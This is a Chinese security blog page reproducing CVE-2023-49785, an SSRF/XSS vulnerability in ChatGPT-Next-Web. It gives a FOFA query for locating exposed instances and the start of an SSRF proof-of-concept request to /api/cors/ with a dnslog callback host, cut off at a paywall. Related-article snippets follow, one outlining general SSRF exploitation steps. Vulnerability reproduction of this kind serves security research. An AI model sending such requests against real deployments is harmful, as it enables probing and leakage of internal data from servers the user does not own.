ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)

已于 2024-03-14 17:55:09 修改
阅读量953 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: chatgpt xss web安全
于 2024-03-14 17:54:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136717498
版权

0x01 产品简介

ChatGPT-Next-Web 是一种基于 OpenAI 的 GPT-3.5 、GPT-4.0语言模型的产品。它是设计用于 Web 环境中的聊天机器人,旨在为用户提供自然语言交互和智能对话的能力。

0x02 漏洞概述

2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS 漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。

0x03 复现环境

FOFA:app="ChatGPT-Next-Web"

0x04 漏洞复现

SSRF-PoC

GET /api/cors/http:%2f%2fnextchat.2222222222.pb0e92.dnslog.cn%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connectio
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述 CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-databind 2.x before 2.9.10.8 错误处理了序列化小工具和打字之间的交互,与org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS有关。 CVE-2020-36181:FasterXML jackson-databind 2.x before 2.9.10.8 错误处理了序列化小工具和打字之间的交互,与org.apache.tomcat.dbcp.dbcp.cpdsada
29 WEB漏洞-CSRF及SSRF漏洞案例讲解-附件资源
03-02
29 WEB漏洞-CSRF及SSRF漏洞案例讲解-附件资源
webcgi-exploits:多语言Web CGI界面漏洞利用
05-13
Web CGI漏洞利用 这是与不同的Web CGI相关的几种漏洞利用。 我在过去几年中写过这些漏洞。 这个怎么运作 Web应用程序基本上就是这些层: 应用领域 网络框架 脚本语言引擎 Web容器(服务器) 网络前端代理(nginx等) 4和5可能是同一回事。 3和4也可能是同一件事。 每层之间都有通信。 每层软件是由不同的团队开发的。 它们确实具有相互通信的标准,但是它们总是存在误解或设计错误。 因此,我们可以利用这些故障来实现我们的目标,例如RCE,spwan a shell,port forward等。 漏洞利用 PHP Fastcgi 参考: 如果fcgi端口公开(或使用SSRF ),则fcgi_exp.go使用fastcgi读取或执行文件。 fcgi_jailbreak.php使用fastcgi参数来更改一些php ini配置并破坏基于php的沙箱。 Apache
漏洞复现ChatGPT-Next-Web SSRF漏洞
weixin_52204925的博客
03-15 1238
ChatGPT-Next-Web 存在SSRF漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。
RCE-远程代码执行漏洞
2301_80661529的博客
03-10 789
远程代码执行(Remote Code Execution,RCE)是一种严重的安全漏洞,允许攻击者在目标服务器或应用程序上执行任意代码。这种漏洞的出现通常源于以下几个方面的缺陷:用户输入未经过滤或验证:当服务器端应用程序未能正确验证用户提交的数据,如HTTP请求参数、文件上传内容、数据库查询语句等,攻击者可能会将恶意代码注入到这些输入中。代码执行功能的设计缺陷:有些系统或应用提供了执行代码的接口,如PHP的函数、Java的反序列化漏洞等,若未做足够的安全防护,攻击者可通过操纵输入使得这些接口执行恶意代码。组
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 349
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1779
ctf_BUUCTF_web
ChatGPT一键私有部署,全网可用,让访问、问答不再受限,且安全稳定!
热门推荐
qq_16027093的博客
05-09 1万+
ChatGPT由于在访问上有一些限制,使用并不便利。目前国内可以直接访问的大部分是调用API返回结果,我们去使用时总会有次数限制,而且它们可能随便崩掉。其实,目前我们访问过的大部分国内的网页包括UI,其实是套用了GitHub上的一些开源项目。所以本文旨在帮助你实现ChatGPT私有部署,全网可用,让访问、问答不再受限,且安全稳定。今天我们分享的是来自GitHub的一个有关ChatGPT私有部署的开源项目。它的UI界面十分精美,而且近期也更新了不少实用功能。
ChatGPT实践】动手创建专属的ChatGPT项目
朝花夕拾
11-18 33
适用于自己动手创建chatgpt的实践项目!
ChatGPT使用手册_step7_通过API使用ChatGPT_第二次_JSON输出
rococolululu的博客
09-13 192
ChatGPT使用手册_step6_通过API使用ChatGPT_第二次_JSON输出
一款整合了ChatGPT的源IP扫描工具
Javachichi的博客
10-17 204
1、支持多线程以实现高性能运行;2、实时状态更新和进度条,适用于大规模扫描;3、针对各种场景和限制设置了灵活的用户参数选项;4、减少数据集以缩短扫描时间;5、易于使用;6、支持CSV格式输出;
OpenAI发布最新的人工智能模型GPT-4o:可实时语言、图像交互
最新发布
代码说,代码让世界更美好。
05-14 1044
OpenAI发布最新的人工智能模型GPT-4o:可实时语言、图像交互
AI图书推荐:ChatGPT等生成式AI在高等教育中的应用
AIGCTribe的博客
05-14 760
该书深入研究了针对专业环境定制的AI素养需求,评估了将ChatGPT融入课程设计中的优劣势,并深入剖析了GenAI时代评价方法的变革。- 解析了创建GenAI模型的过程,包括数据收集、模型设计、训练以及严格测试,并介绍了广泛的GenAI生态系统及其在不同环境中的应用和交互。这本书为理解ChatGPT及其在高等教育中的应用提供了全面的视角,并为教育工作者、学生、政策制定者和学者提供了宝贵的见解和指导。- 探讨了由生成式AI进步驱动的高等教育评估方式的转变,回顾了评估方法的传统起源和演变过程。
国内可用的ChatGPT平替工具推荐
chatpass的博客
05-08 1013
提起AI,大家第一个想到的就是GPT。虽然它确实很厉害,但奈何于我们水土不服,使用门槛有些高。不过随着GPT的爆火,现在AI智能工具已经遍布到各行各业,国内就可免费体验AI产品,今天分就享5个国内的AI工具,有了它们一定能让你事半功倍!
《这就是ChatGPT》读书笔记
whereabouts_的博客
05-10 1322
假设你想(像16世纪末的伽利略一样)知道从比萨斜塔各层掉落的炮弹分别需要多长时间才能落地。当然,你可以在每种情况下进行测量并将结果制作成表格。不过,你还可以运用理论科学的本质:建立一个模型,用它提供某种计算答案的程序,而不仅仅是在每种情况下测量和记录。模型是指有某种特定的基本结构,以及用于拟合数据的一定数量的“旋钮”(也就是可以设置的参数)。对于ChatGPT,我们需要为人脑产生的人类语言文本建立模型。如果函数给出的结果总是与人类的意见相符,那么我们就有了一个“好模型”。
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞,攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来发起内网扫描、访问内部系统等攻击。通常情况下,攻击者会构造恶意请求,将目标网站的请求地址改为内部 IP 或者域名,从而让服务器发起请求,从而得到内部系统的信息。 下面是一个简单的 SSRF 漏洞利用的步骤: 1. 扫描目标网站:使用端口扫描工具扫描目标网站开放的端口,确定是否存在可利用的服务。 2. 构造恶意请求:构造一个包含内网地址的恶意请求,将请求地址改为内网地址。 3. 触发漏洞:将恶意请求发送给目标网站,从而触发 SSRF 漏洞。 4. 收集信息:利用 SSRF 漏洞,收集内部系统的信息,如端口、服务、操作系统等。 5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范 SSRF 漏洞,如过滤用户输入、限制请求地址等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值